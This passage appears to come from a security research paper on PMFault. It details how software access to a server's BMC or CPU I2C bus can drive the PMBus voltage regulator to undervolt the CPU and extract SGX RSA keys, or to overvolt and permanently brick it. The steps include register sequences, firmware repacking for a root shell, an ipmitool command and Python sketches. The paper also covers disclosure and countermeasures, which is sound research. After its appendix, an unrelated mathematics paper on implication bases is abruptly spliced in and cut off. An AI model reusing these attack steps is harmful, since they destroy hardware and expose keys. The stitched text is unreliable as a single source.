image, while the BMC website FS is another compressed file system with only the file system header encrypted. The FW Footer starts with a magic value ATEN_FW and contain information about the firmware version, checksum, etc. The FW Table is an encrypted region and stores a table of the image layout. All encrypted region of the firmware can be decrypted with a key extracted from _ipmi.so_ on the _rootFS_. Figure 5: Setup of the E3-1220V6-X11SSL-CF for practical experiments. These connections are for experiments only; physical access is not required in the actual attack. Discovering the VRM AddressFinding the I2C address of the VRM is the first step of PMFault. The easiest way to explore the I2C buses is to use the interface provided by the OS. There are two I2C buses that can be used from the OS running on the CPU: i2c-0 is shown by default, while i2c-1 requires the i2c_i801 kernel module to be loaded. To find all available devices on both I2C buses, we ran the i2cdetect tool on them. We found that there are 12 devices in total connected to the I2C bus. The full list of device addresses can be found in Appendix A. To then determine which device is a VRM, we use the result of the standard PMBus command, READ_VOUT, as an indicator. The Plundervolt [MOG\({}^{+}\)20] attack showed that the normal operating voltage of the CPU should be greater than 0.55 V, thus, if the voltage read by READ_VOUT is within this range, it may be a VRM. Of the 12 devices detected, only one device with address 0x20 on I2C bus 1 responded with a value in this voltage range. We hence suspect this device is the VRM. To verify the result, we also used MFR_ADDR_PMBUS (0xE1) command found in the MP2965 datasheet [Mon] to read the PMBus address of the device. The result is 0x20, which confirms our finding. 
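A compact sketch of this detection heuristic (probe every address, treat a READ_VOUT value in the plausible core-voltage window as a VRM candidate, and cross-check with MFR_ADDR_PMBUS) could look as follows; the VR12-style 5 mV VID decoding is an assumption made purely for illustration, since the real mapping depends on the VRM and its configured VID table, and blindly reading registers on a live bus can upset other devices.

```python
# Sketch of the VRM-discovery heuristic: probe each I2C address, read
# READ_VOUT (0x8B), flag devices whose decoded voltage sits in the plausible
# Vcore window, and cross-check via MFR_ADDR_PMBUS (0xE1). For analysis use
# only: blind register reads can confuse other devices on a production bus.
from smbus2 import SMBus

READ_VOUT      = 0x8B
MFR_ADDR_PMBUS = 0xE1  # manufacturer-specific, taken from the MP2965 datasheet

def vid_to_volt(vid: int) -> float:
    # Assumption for illustration only: VR12-style 5 mV VID steps with a
    # 0.245 V offset. The real decoding is VRM- and VID_STEP_SEL-dependent.
    return 0.245 + 0.005 * vid if vid else 0.0

def scan(busno: int = 1):
    candidates = []
    with SMBus(busno) as bus:
        for addr in range(0x08, 0x78):            # valid 7-bit addresses
            try:
                raw = bus.read_word_data(addr, READ_VOUT)
            except OSError:
                continue                           # NACK: no (PMBus) device here
            volt = vid_to_volt(raw & 0xFF)
            if 0.55 <= volt <= 1.52:               # plausible CPU core voltage
                try:
                    pmbus_addr = bus.read_word_data(addr, MFR_ADDR_PMBUS) & 0x7F
                except OSError:
                    pmbus_addr = None
                candidates.append((addr, volt, pmbus_addr))
    return candidates

if __name__ == "__main__":
    for addr, volt, pmbus_addr in scan():
        print(f"0x{addr:02x}: Vout ~ {volt:.3f} V, MFR_ADDR_PMBUS = {pmbus_addr}")
```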
Changing CPU Voltage with PMBus CommandsHaving identified the VRM, one can next attempt to send commands to change the CPU voltage. In the datasheet of the MP2965 [Mon], we found an "overclocking" procedure that can be used for this purpose. There are two overclocking modes, _tracking mode_ and _fix mode_. In PMFault, we mainly use the fix mode to set a defined voltage. In the fix overclocking mode, the VRM uses the VID configured with the PMBus command VOUT_COMMAND and ignores the configuration from the SVID bus. Figure 6 shows the steps of using this mode to change voltage. First, we need to configure two registers: The first one is VOUT_OPERATION; by setting the first bit of this register, we enable PMBus override mode. We also have to set bit 3 of MFR_VR_CONFIG to make the VRM act on these changes. After this, the voltage supplied to the CPU will be changed according to the configuration in VOUT_COMMAND. To send this PMBus command sequence and change the CPU voltage, we wrote a PoC with the libi2c. This PoC can be compiled and run under Linux. "Stalls" caused by PMBus CommandsThe experiments in Section 4.1 also show that the VRM responds to the PMBus commands sent from the CPU. One may thus assume that it would then be straightforward to directly send PMBus commands to change the CPU voltage with this method. However, we found that the CPU stalls after sending the MFR_VR_CONFIG command to actually configure the VRM to use the new voltage. This will make the CPU voltage being kept at the changed value with no way to change it back. This phenomenon raised two questions: Is the CPU stall caused by a crash or a recoverable halt? If it is caused by a recoverable halt, will this protect against targeted undervolting fault injection? To answer this, we connected a Raspberry Pi to the PMBus to directly control the VRM. The I2C interface to the VRM is exposed with two pins, SDA and SCL. As shown in Figure 5, we connected the I2C interface of the Raspberry Pi to these pins. In the first experiment, we sent a command to disable overclocking after the stall happens. It appears that with the VRM reconfigured to normal mode, the CPU recovers from the stall situation if the undervolting value is not too low. This shows that the stall is Figure 6: Command sequence to change the voltage via PMBus. caused by a recoverable halt and not a crash. The second experiment is used to find out if the halt will prevent the fault from happening. In this experiment, we used the CRT-RSA PoC of the Plundervolt attack. With the CPU running this PoC, we used Raspberry Pi to send PMBus commands to produce voltage glitches. We found that with glitches with gradually lower voltage, an exploitable fault happens with the CRT-RSA calculation. Hence, in summary, the "stall" phenomenon will prevent the PMBus attack from being conducted by the CPU-VRM I2C interface, but it does not prevent the fault caused by undervolting from having an impact on CPU calculations. Voltage Control with BMCBecause our attempt of voltage glitching failed with the PoC running on the CPU, we started to look into the BMC-VRM I2C interface. In the BMC firmware dumped in Section 3.1, we found the i2c.ko kernel module, which provides a driver for the I2C interface. However, this module does not implement a standard ioctl() for I2C devices, which is required for using libi2c. This means that the above PoC, which uses this standard I2C library, cannot be used to communicate with this kernel module. 
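For reference, the Figure 6 sequence maps onto ordinary Linux I2C byte/word transfers as sketched below (shown with the smbus2 package, i.e., exactly the kind of standard ioctl-based access that the BMC's stock i2c.ko does not offer); the bit positions follow the MP2955/MP2965 description above, the register widths are assumptions, and running this against real hardware can stall or crash the machine, so it is an illustration rather than a ready-to-use exploit.

```python
# Sketch of the fix-mode voltage-override sequence from Figure 6:
#   1. set the PMBus-override bit (bit 1) in CMD_OPERATION (0x01),
#   2. write the target voltage code into VOUT_COMMAND (0x21),
#   3. set the fix-overclock bit (bit 3) in MFR_VR_CONFIG (0xE4).
# Register widths (byte vs. word) are assumptions; the semantics are specific
# to the MPS VRM discussed above, and running this can stall or crash the host.
from smbus2 import SMBus

VRM_ADDR      = 0x20
CMD_OPERATION = 0x01
VOUT_COMMAND  = 0x21
MFR_VR_CONFIG = 0xE4

def set_fixed_vout(bus: SMBus, vid: int) -> None:
    op = bus.read_byte_data(VRM_ADDR, CMD_OPERATION)
    bus.write_byte_data(VRM_ADDR, CMD_OPERATION, op | 0x02)    # bit 1: PMBus override
    bus.write_word_data(VRM_ADDR, VOUT_COMMAND, vid & 0xFFFF)  # target VID / voltage code
    cfg = bus.read_word_data(VRM_ADDR, MFR_VR_CONFIG)
    bus.write_word_data(VRM_ADDR, MFR_VR_CONFIG, cfg | 0x08)   # bit 3: fix overclock mode

def restore_svid_control(bus: SMBus) -> None:
    # Mirrors the "reconfigure the VRM to normal mode" recovery step described
    # above: clearing the override hands voltage control back to the SVID bus.
    op = bus.read_byte_data(VRM_ADDR, CMD_OPERATION)
    bus.write_byte_data(VRM_ADDR, CMD_OPERATION, op & ~0x02)

if __name__ == "__main__":
    with SMBus(1) as bus:   # /dev/i2c-1 on the host; a different bus number on the BMC
        pass                # set_fixed_vout(bus, some_vid) deliberately not called here
```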
As the kernel module in the firmware did not implement the standard I2C API, we had to find another way to utilize the BMC's I2C interface. With the help of the I2C driver in the latest Linux kernel [astb, asta], we found that there are 14 I2C interfaces on the AST2400 BMC controller. Each has a set of memory-mapped registers to control the interface. We also found the setup and message sending/receiving sequence of the I2C interface. We then created a small library to directly write these registers and send I2C bus commands from the BMC CPU to the address of the VRM. By monitoring the I2C activity with an oscilloscope (this was only required for debugging and during development), we found that the I2C bus 2 (counted from bus 0) of the BMC has the VRM connected. ### Enabling SSH Access and Firmware Repacking Modification of the firmware can be used to obtain a root shell on the BMC. With the "Supermicro BMC firmware image decryptor" [10] and a modified version of the "ipmi firmware tool" [10] with added support for X11 images, we were able to extract the firmware encryption key and decrypt the file system header. With these, we can unpack and modify the full root file system. As described in Section 3.2, /SMASH/msh provides the shell for SSH service. To enable full root shell access, we replaced this file with a shell script with a single line to execute /bin/sh. Besides, as the SSH service is running with root privileges, with the shell redirected to sh, we could obtain a root shell once connected to the SSH. To repack the image, we modified the "Supermicro BMC firmware image decryptor" tool to add firmware encryption support and constructed a firmware package with a valid footer and firmware table. We successfully tested and installed this modified firmware package both with the web firmware upgrade interface and the IPMI firmware upgrade interface via the AlUpdate tool. ### Attack Chains for PMBus Access In this section, we discuss three possible attack chains to take over the PMBus with the techniques shown in the previous sections. The attacker can use any of these attack chains and change the CPU voltage to perform PMFault attacks, _i.e._, to over/undervolt the CPU. Remote BMC Firmware UpgradeThe first attack chain assumes a malicious insider threat model. This attack chain makes use of the web or IPMI interface through the BMC Ethernet connection. To use this interface, the attacker needs to have access to the BMC management Ethernet port or the shared management Ethernet port eth0 on the system. Besides, the attacker needs to obtain valid credentials to login to the BMC. In detail, the attacker can first use the method described in Section 4.2 to repack the SMT_X11_163 firmware upgrade package from [bmc] to enable SSH root access to the BMC. Then, they can upload the firmware with the web management interface or the IPMI management interface over Ethernet. With the SSH interface enabled, the attacker can cross-compile the voltage-changing PoC described in Section 4.1 for the BMC, and then upload and execute it to send PMBus commands. We used base64 -d > /tmp/i2c-pmbus-send to upload our exploit code due to the unavailability of the SCP service on the BMC OS. Local BMC Firmware UpgradeSimilar to the first, this attack chain also involves a firmware upgrade for code execution on the BMC. However, we use the KCS interface discussed in Section 3.3 to upgrade the firmware. 
The attacker does not require access to the management Ethernet plane, instead, only root privileges on the OS running on the CPU are required. This is e.g., relevant for data centers that host bare metal machines for customers or for malware/ransomware that has obtained root through other exploits. IPMI InterfaceThe third attack chain uses the IPMI I2C functionality. An attacker with root access on the CPU OS or access to the management port of the BMC can use this interface to send commands to any I2C device that is connected to the BMC. The command used for sending the raw I2C packets is shown in Listing 1. The I2C mapping of this interface is the same as found during the initial investigation in Section 4.1. The VRM is at address 0x20 on bus 2. However, since the last bit of the first packet of I2C indicates the type of operation (read or write), we need to shift the device address left by one bit and set the last bit accordingly when using this interface to control PMBus. ``` ipmitool i2c bus=2 0x40 <PMBus Command> <PMBus Data> ``` Listing 1: IPMI command for sending I2C packets. ## 5 Undervolting and Overvolting Attacks In this section, we show how under/overvolting through the PMBus leads to attacks on SGX and also permanent physical damage to the CPU. The attack requires any flaw that gives a software attacker access to the PMBus. As mentioned in Section 4.3, this can e.g., be a malicious firmware upgrade or the use of the IPMI-to-I2C functionality. The attack is generic in the sense that _various_ flaws can lead to the same outcome: remote fault injection attacks on SGX and bricking the CPU. Figure 7 shows an overview of the attacks. ### Undervolting Attack against Intel SGX Adversary ModelAs mentioned in Section 1.2, we assume a threat model where an attacker (including a malicious insider) has full software access to the system but no (or limited) physical access. More precisely, the attacker has root access to the OS and software access to the BMC via the KCS interface or Ethernet. All attack chains described in Section 4.3 can generally be used under this threat model. It is worth mentioning that the attack that uses ipmitool through the KCS interface does not require knowledge of the BMC credentials. A privileged local user on a compromised host CPU can thus use ipmitool to inject faults into SGX purely from software. Proof of ConceptWe used the same PoC code as Plundervolt/VoltPillager [30]. Before injecting the voltage glitch, we use the attack chain described in Section 4.3 to gain control of the PMBus. To start with, we used the multiply operation as the first target, as it is a simple target to fault. By gradually lowering the CPU voltage with the PMBus commands sent by the BMC while running the Plundervolt/VoltPillager PoC on the CPU, we successfully injected faults into the multiply operation (in our experiments at voltage \(0.845\,\mathrm{V}\) with the CPU running at \(2\,\mathrm{GHz}\)). To verify the fault injection also works for encryption operations running in SGX, we ran the CRT-RSA signature PoC from Plundervolt/VoltPillager, with an RSA signature computed inside an enclave using the Intel Integrated Performance Primitives (Intel IPP) cryptography library functions [Cor]. Again, we could obtain faulty signatures as shown in Listing 2. Furthermore, we confirmed that these faulty values could be used to factor the RSA modulus and recover the private RSA key using the Lenstra attack [1]. 
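The key-recovery step itself is standard: when the fault corrupts only one of the two CRT half-exponentiations, a single gcd with the public modulus reveals a prime factor. The sketch below is the textbook Lenstra (Boneh-DeMillo-Lipton) computation on toy parameters, not the paper's code; m stands for the padded message representative that was actually signed.

```python
# Sketch of Lenstra-style key recovery from a single faulty CRT-RSA signature.
# If the fault corrupted only the mod-q half, then s_f^e = m (mod p) but not
# (mod q), so gcd(s_f^e - m, N) recovers the prime factor p.
from math import gcd

def factor_from_faulty_signature(n: int, e: int, m: int, s_faulty: int):
    """Return a nontrivial factor of n, or None if this fault is unusable."""
    p = gcd((pow(s_faulty, e, n) - m) % n, n)
    return p if 1 < p < n else None

if __name__ == "__main__":
    # Toy parameters for illustration only; real targets use 2048-bit keys.
    p, q, e = 999983, 1000003, 65537
    n = p * q
    d = pow(e, -1, (p - 1) * (q - 1))
    m = 123456789 % n                       # padded message representative
    s_p = pow(m, d % (p - 1), p)            # correct half, mod p
    s_q = (pow(m, d % (q - 1), q) + 1) % q  # faulted half, mod q
    q_inv = pow(q, -1, p)                   # CRT (Garner) recombination
    s_faulty = (s_q + q * (((s_p - s_q) * q_inv) % p)) % n
    print(factor_from_faulty_signature(n, e, m, s_faulty))  # expected: 999983
```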
``` // Faulty calculation 1: faulty CRT-RSA signature bytes (abridged; trailing zeroes left out) ... Incorrect result! ``` Listing 2: Faulty CRT-RSA decryptions/signatures generated by the respective ipps functions. Reproducibility of CRT-RSA Fault InjectionTo further evaluate the reproducibility of the attack, we set up an automated testing environment by connecting a Raspberry Pi to an Ethernet port (eth0) and the power button of the motherboard. We ran a Python script to repeat the following steps numerous times: 1. Upload the exploit for controlling the CPU voltage to the BMC via an SSH connection. 2. SSH into the OS running on the host CPU and trigger CRT-RSA signing in an SGX enclave. 3. Run the PMFault exploit on the BMC to gradually lower the CPU voltage while the signature is computed in the SGX enclave. 4. Stop lowering the CPU voltage when a fault occurs. 5. Record the result and clean up. 6. If no faulty result is output, the system may have crashed because the voltage was too low. In this case, we use the connection to the motherboard power button to reboot the system and wait for it to boot into a stable state. Figure 7: Overview of the PMFault attack. With root access to the OS or access to the BMC via Ethernet or KCS, the attacker can perform a malicious firmware upgrade of the BMC and then take over the PMBus. The attacker can also use the ipmi i2c command to directly control the PMBus via the BMC. With control over the CPU voltage, the attacker can overvolt to brick the CPU or undervolt to inject faults into SGX. In total, we conducted 253 tests within 545 min. Of those, faults occurred in 194 tests. 66 of these faulty results could be used to successfully recover the correct RSA private key using the Lenstra attack, which translates to a success rate of 26%. On average, a useful fault could be obtained within 9 minutes. ### Overvolting to Permanently Brick a CPU Apart from the undervolting attack to extract keys from an SGX enclave, we also discovered another attack, which is an overvolting attack that can permanently destroy the CPU. Adversary ModelIn this attack, as described in Section 1.2, we assume an attacker who has root privilege on the host CPU. For example, this could be in the case that an attacker has placed ransomware on a system and threatens to damage the CPU unless a ransom is paid. Clearly, root should have full control of all software running on the CPU, but _should not_ be able to cause any physical damage to the system. The attack chain described in Section 4.3 using ipmitool with KCS can be used within this threat model. Proof of ConceptTo overvolt the CPU, we firstly configure the MFR_VR_CONFIG register of the VRM to use the 10 mV SVID table. This allows changing the CPU voltage up to 3 V. 
We also disabled the over-current protection by reconfiguring the MFR_OCP_TOTAL_SET register. Then we used the voltage changing procedure to change the CPU voltage to a value much higher than the normal operating voltage. We found that this procedure allows changing the CPU voltage up to \(\sim\)2.84 V for \(\sim\)1 ms, which is outside the typical operating range of Intel CPUs. By increasing the voltage beyond the specified operating voltage range (0.55 V-1.52 V) [11] of a 7th Gen Intel E3-1220V6 CPU two times, we permanently destroyed the CPU and left the system in an unbootable state within a few seconds. We successfully repeated the experiment with a second, identical CPU. An example of overvolting is shown in Figure 8. For environmental and financial reasons, we were satisfied after successfully destroying two CPUs and decided to not perform further experiments in that regard. ## 6 Evaluation of other Server Motherboards As we found the PMBus to be a common interface present on server motherboard, we decided to investigate other manufacturers as well. To facilitate larger-scale testing of this, we wrote a tool called PMBusDetect. With this tool, we scan the system for a PMBus connection and try to detect the VRM address. We applied this tool to several other systems, including an ASRock rack motherboard (ASRock E3C246D4I-2T) and a Supermicro X12DPi-NT6 motherboard (kindly provided by Supermicro for testing). We then conducted further analysis of these systems to check if they are vulnerable to any PMBus-related attack. PMBusDetect Tool for VRM DetectionBased on the VRM detection process mentioned in Section 4.1, we built the PMBusDetect tool to automatically scan all addresses of a specified I2C bus for VRMs. During testing, we found that the implementation of PMBus and usage of the VRM is different between motherboard, and the most stable command to identify a VRM is READ_TEMPERATURE (0x8d). We use the response to this command as an initial indicator to identify whether a VRM is present, and then use the VRM detection process from Section 4.1 to verify the result. Moreover, as the capabilities and voltage changing sequence can differ between VRM vendor, we added an additional procedure to detect the vendor of the VRM. For this, we use the result of reading ISL_DEVICE_ID (0xad) as an indicator for Intersil VRMs and SVID_VENDOR_PRODUCT_ID (0xbf) for MPS, respectively. Detection based on ipmi i2c is also implemented for detecting the connection between VRM and the BMC as mentioned in Section 4.3. An example output of PMBusDetect with Supermicro X11SSL-CF is shown in Appendix B, while Table 3 shows a summary of the motherboard tested and the scan result for VRMs with PMBusDetect. We are aware that our testing--restricted by (lack of) access to server hardware-- only gives a very limited picture of the use of PMBus and VRMs on server hardware. We hence decided to open-source PMBusDetect and build on community efforts in the future to obtain a better view of the PMBus landscape. ### ASRock Power-Down Attack The ASRock E3C246D4I-2T motherboard uses an Intel Xeon E-2124 CPU with an Intel C246 Chipset and ASPEED AST2500 BMC with login credentials defaulting to ADMIN:ADMIN. We used the PMBusDetect tool together with manual probing and found that the VRM of this motherboard is connected to both the BMC and I2C bus of the CPU. In the following attack, we assume that the attacker is a user on a baremetal server with root access in the OS. The VRM used on this motherboard is an ISL69138. 
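A sketch of the vendor fingerprinting that PMBusDetect performs, and that tells an Intersil part such as this ISL69138 apart from the MPS part on the X11 board, might look as follows; the register codes are the ones named above, and treating an ACK on a vendor-specific ID register as a vendor match is a heuristic rather than a guarantee.

```python
# Sketch of PMBusDetect-style VRM identification: READ_TEMPERATURE (0x8D) as
# the "is there a PMBus VRM here at all?" probe, then the vendor-specific ID
# registers named above (ISL_DEVICE_ID for Intersil, SVID_VENDOR_PRODUCT_ID
# for MPS). An ACK on an ID register is treated as a vendor hint only.
from smbus2 import SMBus

READ_TEMPERATURE       = 0x8D
ISL_DEVICE_ID          = 0xAD
SVID_VENDOR_PRODUCT_ID = 0xBF

def identify_vrm(busno: int, addr: int) -> str:
    with SMBus(busno) as bus:
        try:
            bus.read_word_data(addr, READ_TEMPERATURE)
        except OSError:
            return "no temperature reading: probably not a PMBus VRM"
        for reg, vendor in ((ISL_DEVICE_ID, "Intersil"),
                            (SVID_VENDOR_PRODUCT_ID, "MPS")):
            try:
                bus.read_word_data(addr, reg)
                return vendor
            except OSError:
                continue
        return "PMBus VRM with no known vendor ID register"

if __name__ == "__main__":
    # 0x60 on bus 2 is where the ISL69138 answers on the E3C246D4I-2T.
    print(identify_vrm(2, 0x60))
```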
\begin{table} \begin{tabular}{c c c c c} \hline \hline Name & BMC & Chipset & VRM Address & PMBus Connects to \\ \hline Supermicro X11SSL-CF & AST2400 & C232 & 0x20 & BMC \& CPU \\ Supermicro X12DPi-NT6 & AST2600 & C621A & 0x30 \& 0x34 & — \\ ASRock E3C246D4I-2T & AST2500 & C246 & 0x60 & BMC \& CPU \\ \hline \hline \end{tabular} \end{table} Table 3: Tested motherboards and their VRM detection result. Figure 8: Oscilloscope capture of voltage change during overvolting, VOUT_COMMAND set to 0xFF (with 10 mV VID table). Yellow: PMBus clock, blue: \(V_{cpu}\). \(V_{cpu}\) shoots up to 2.84 V during overvolting. Because it is made by a different manufacturer compared to the MP2955, the voltage changing PMBus command sequence used for the MP2955 does not work with this VRM. Due to the lack of documentation of this procedure, we are currently unable to precisely overvolt or undervolt the CPU via the PMBus. Yet, we discovered a new attack to disable the VRM and force a power-down of the CPU, leaving the system in a (temporarily) inoperable state. PMBusDetect shows that the VRM is at address 0x60 on I2C bus 2 of the host CPU. In contrast to the findings for the Supermicro X11SSL-CF, this VRM uses PMBus registers on page 0x1 instead of the default 0x0. We then issue the ON_OFF_CONFIG (0x02) and OPERATION (0x01) commands: We configure OPERATION to "Immediate Off" and set the "source of enable" only to ON_OFF_CONFIG. This results in an immediate power-off of the VRM and crashes the system. During testing, we found the PMBus is only writable from the CPU with the IPMI-over-KCS interface, but not from the BMC with ipmi i2c commands. As a result, it is not possible for the administrator of the system to remotely configure the VRM back to a normal state. Simply issuing the ipmi powercycle command with IPMI over LAN will leave the system in an infinite boot loop. To recover from this attack, the administrator has to physically power-cycle the system, which might increase downtime in a Denial-of-Service (DoS) scenario. This shows that PMBus as an attack vector does not only affect the Supermicro X11SSL-CF, but can also have an impact on servers from other manufacturers. Besides, we believe that it might also be possible to conduct CPU bricking attacks if the PMBus voltage changing sequence of the Intersil VRM is known. We leave this for future work. ### Other Supermicro X11 Motherboards We also ran the PMBusDetect tool on X11SPG-TF and X11SSE-F Supermicro server motherboards--in both cases, the VRM was reachable in the default configuration. To test if they are vulnerable to PMFault, we sent PMBus commands through ipmi i2c commands and successfully undervolted them to crash the system. This shows that the attack chain through the IPMI interface is valid on these systems. As the systems were provided by a third party for remote testing, we were not able to attempt overvolting and similar, destructive experiments, but believe these motherboards to be equally affected. ### Supermicro X12 Motherboards We disclosed the vulnerability to Supermicro in May 2022. They confirmed the issue and also provided an X12-generation server for further testing. This system, Supermicro X12DPi-NT6, features a dual Intel Xeon Gold 6330 CPU, Intel C621A Chipset, and AST2600 BMC. Our investigation shows that mitigations had already been implemented on this motherboard to break the attack chain of PMFault before we reported the attack to Supermicro. 
Firstly, the firmware upgrade package is properly signed with RSA and verified during the firmware upgrade process, which prevents malicious firmware uploads to the BMC via IPMI. This breaks the attack chain though firmware upgrade. Secondly, I2C packet filtering has been implemented in the BMC, which prevents IPMI commands to directly send packets to the PMBus. Moreover, our PMBusDetect tool shows that the VR is not connected to the CPU, which prevents an attack directly from the operating system. In conclusion, to the best of our knowledge, we believe that Supermicro X12DPi-NT6 is not directly vulnerable to the attacks described in this paper. However, we note that as-of-yet unknown vulnerabilities might remain in the firmware update process and the complex software stack running on the BMC, which warrants further investigation. ## 7 Conclusions and Countermeasures In this paper, we demonstrated two remote attacks that use the PMBus interface to control the CPU voltage. An undervolting attack can be used to inject fault to the SGX enclave of the CPU and e.g., recover a secret key used in cryptography algorithms. The overvolting attack causes permanent damage to the CPU. The attack affects, to our knowledge, all 11th generation Supermicro systems. It also impacts ASRock (tested with ASRock E3C246D4I-2T), though as described the VRM behaves differently to Supermicro. We suspect that the attack might also affect other vendors (given that BMCs are often similar), but could not further investigate this and thus leave it for future work. ### Server Platform Security and Embedded System Security We first discuss the security considerations for server platforms. Previous security research on computer platforms were mainly focused on the security of the software (either running on the CPU or the management controller). However, each subsystem on a server platform does not act in isolation. Instead, they may interact with each other via the physical connections on the motherboard. In our attacks, we show that the hardware design of the system with a correctly implemented ipmitool can lead to severe security issues and damage to the system. Apart from the components on the motherboard, one should also take "plugin" devices into consideration when analysing the security of server platforms. During our investigation of the system, we found that when a Peripheral Component Interconnect Express (PCI-E) device is plugged onto the motherboard, it is also connected to the I2C bus of the motherboard. However, if the firmware of a PCI-E device is compromised, it can gain access to the PMBus to perform the same attacks described in this paper. On E3-1220V6-X11SSL-CF, this connection can be configured with a jumper named JI2C. Although this jumper is disconnected by default, the user may not be aware of the security implications of connecting this jumper. In summary, the server platform is a system that has multiple components and microcontrollers. The security of the platforms is not only down to ensuring the security of the software running on it, but the overall design of the hardware and embedded systems on the motherboard should also go through a thorough security review. Securing such a system needs collaborative effort of both software developers and hardware engineers. 
### SGX Security

Our attack on SGX enclaves shows that a privileged local attacker can inject a fault into the enclave and recover secret information through the server management interface, effectively reviving Plundervolt-like software undervolting attacks on Supermicro X11 motherboards. We also demonstrate that a malicious service provider (e.g., a cloud hosting provider) can use the attack chains described in the paper to break the security guarantee provided by SGX. Moreover, the vulnerability currently cannot be detected/mitigated by SGX attestation, because the BMC and its firmware are not within the scope of SGX attestation. A supply chain attack is also possible: as the firmware is not securely verified, it is possible for a third party to implant malware into the BMC and later launch remote attacks on SGX and/or damage the CPU. Such a firmware modification is also conceivable while the device is being shipped to the end user. Detecting such an attack would be hard, as the firmware of the BMC is stored in a separate flash chip. The software running on the BMC is thus usually out of scope for traditional malware detection methods.

### Countermeasures

**Overvolting Attack.** According to our experiments, PMBus-based overvolting can lead to permanent damage to the CPU and thus permanent DoS of the system. The fundamental issue that leads to this attack is the lack of a hardcoded voltage limit in the VRM. Simply adding signature verification of the BMC firmware or using secure boot to break the attack chain might not be sufficient to prevent overvolting, as other, future attacks might also yield PMBus access. Besides, configuring software-based PMBus read/write limitations of the VRM through the MFR_PWD_USER command is also insufficient to stop the attack. This is because this feature only sets a 16-bit passcode, which is prone to brute-force attacks. We suggest the following mitigations be implemented for this attack to break the attack chain:

1. In the short term, the user manual of the relevant system(s) should be updated to describe the usage and suggested configuration of the SMBDAT_VRM and SMBCLK_VRM jumpers, if they are present on a specific model.
2. In the long term, an alternative VRM with a hardwired voltage safety limit should be used to replace the current VRM.
3. Another mitigation would be implementing an I2C filter to detect and block malicious PMBus packets. MFR_VR_CONFIG, which can be used to set a 10 mV VID table, is one of the main commands that need to be blocked. Optionally, other commands involved in the overclocking procedure could be blocked; however, this may affect users who actually want to use this feature. Such a filter could be implemented in a small microcontroller that listens to the I2C bus and "jams" malicious commands by actively pulling the bus low once the command has been detected but before its transmission has been completed.

**PMBus-based SGX Undervolting.** To the best of our knowledge, PMFault represents the first attack that directly breaches integrity guarantees in the Intel SGX security architecture through the PMBus interface. We believe that the fix currently deployed by Intel against Plundervolt/VoltPwn (CVE-2019-11157)--disabling the SVID undervolting interface--is insufficient when a remote attacker can get access to the PMBus through the BMC or the I2C interface of the CPU, as is the case for Supermicro X11 motherboards. We note that there might be many other devices connected to the bus, including PCI-E devices like graphics cards.
It is thus also possible for a compromised PCI-E device to send malicious commands to control the CPU voltage. Given the potential impact of our findings regarding fault injection into SGX enclaves, in the short term, we recommend inserting software-based fault injection countermeasures into cryptographic computations in enclaves (e.g., the quoting enclave). However, we note that such fixes can only serve as mitigations and cannot fully eliminate this attack vector. We would like to highlight that, in our opinion, this attack surface _cannot_ be easily addressed by jumpers that disconnect the VRM from the SMBus or by adding signature verification of the BMC firmware, as we believe that SGX attestation cannot independently verify the relevant system configurations:

1. The existence of a PMBus/SMBus interface to the VRM and whether it can be controlled through the I2C interface of the CPU;
2. The existence of an external microcontroller on the motherboard and whether it has the functionality to control the VRM (e.g., the BMC or other PCI-E devices);
3. The firmware security status of the BMC and other devices on the PMBus.

This makes it impossible for SGX to give assurance of the trust status of the system. We believe that in the long term, appropriate hardware countermeasures _inside_ the CPU package are required: this could on the one hand include continuous monitoring of the received supply voltage, as recently presented by Intel for critical parts of their systems [17], and on the other hand the use of fully integrated voltage regulators.

## Acknowledgements

This research is partially funded by the Engineering and Physical Sciences Research Council (EPSRC) under grants EP/R012598/1, EP/R008000/1, and EP/V000454/1. The results feed into DsbDtech. We would also like to thank Supermicro for providing an X12DPi-NT6 server for further investigation of the issue.
## Appendix A i2cdetect Result for Supermicro X11SSL-CF

$ sudo i2cdetect 0

[i2cdetect address map not reproduced]
2304.06837
Independence of Essential Sets in Finite Implication Bases
A new characterization is given to describe implication bases of a closure system in terms of the system's quasi-closed sets. Using this characterization, it is possible to show that groups of implications corresponding to distinct essential sets are interchangeable across different bases. It follows from this result that the sum of cardinalities of right sides of all implications corresponding to a single essential set in an optimal basis is fixed, solving an open conjecture by K. Adaricheva and J.B. Nation in 2014. These results provide greater insight into the global structure of implication bases.
Todd Bichoupan
2023-04-13T22:01:20Z
http://arxiv.org/abs/2304.06837v2
# Independence of essential sets in finite implication bases

###### Abstract.

A new characterization is given to describe implication bases of a closure system in terms of the system's quasi-closed sets. Using this characterization, it is possible to show that groups of implications corresponding to distinct essential sets are interchangeable across different bases. It follows from this result that the sum of cardinalities of right sides of all implications corresponding to a single essential set in an optimal basis is fixed, solving an open conjecture by K. Adaricheva and J.B. Nation in 2014. These results provide greater insight into the global structure of implication bases.

Definitions and notational conventions are borrowed from [2]. A _closure system_ \(\langle X,\phi\rangle\) is a nonempty set \(X\) equipped with a _closure operator_ \(\phi:\mathcal{P}(X)\mapsto\mathcal{P}(X)\) that satisfies the following for all \(A,B\subseteq X\):

* \(A\subseteq\phi(A)\)
* \(A\subseteq B\implies\phi(A)\subseteq\phi(B)\)
* \(\phi(\phi(A))=\phi(A)\)

A set \(A\subseteq X\) is _closed_ if \(A=\phi(A)\). \(X\) itself is closed, and any intersection of closed sets is closed. The family of closed sets associated with a closure system is unique in the sense that any two distinct closure operators on a set \(X\) generate distinct families of closed sets. Moreover, any family of subsets of \(X\) that is closed under set intersection and contains \(X\) is the family of closed sets associated with some closure operator. An _implication_ on a nonempty set \(X\) is an ordered pair of sets \(A,B\subseteq X\) denoted \(A\to B\). A set \(S\subseteq X\) obeys an implication \(A\to B\) if \(A\not\subseteq S\) or \(B\subseteq S\). For any set \(\Sigma\) of implications on \(X\), the family of sets that obey all implications in \(\Sigma\) forms a closure system, \(\langle X,\phi\rangle\), and \(\Sigma\) is said to be an _implication basis_ for \(\langle X,\phi\rangle\). If \(\langle X,\phi\rangle\) is a closure system and \(F\) is the associated family of closed sets, then a set \(Q\subseteq X\) is _quasi-closed_ if \(Q\not\in F\) and \(F\cup\{Q\}\) is still closed under set intersection (i.e., for every \(S\in F\), \(S\supseteq Q\) or \(S\cap Q\in F\)). For any quasi-closed set \(Q\), the closure \(\phi(Q)\) is called an _essential set_. If \(\mathcal{Q}\) is the family of all quasi-closed sets associated with \(\langle X,\phi\rangle\), then \(F\cup\mathcal{Q}\) turns out to be closed under set intersection and has an associated closure operator, \(\sigma\); \(\sigma\) is called the _saturation operator_ associated with \(\langle X,\phi\rangle\). A _quasi-closed_ set \(Q\) associated with a closure system \(\langle 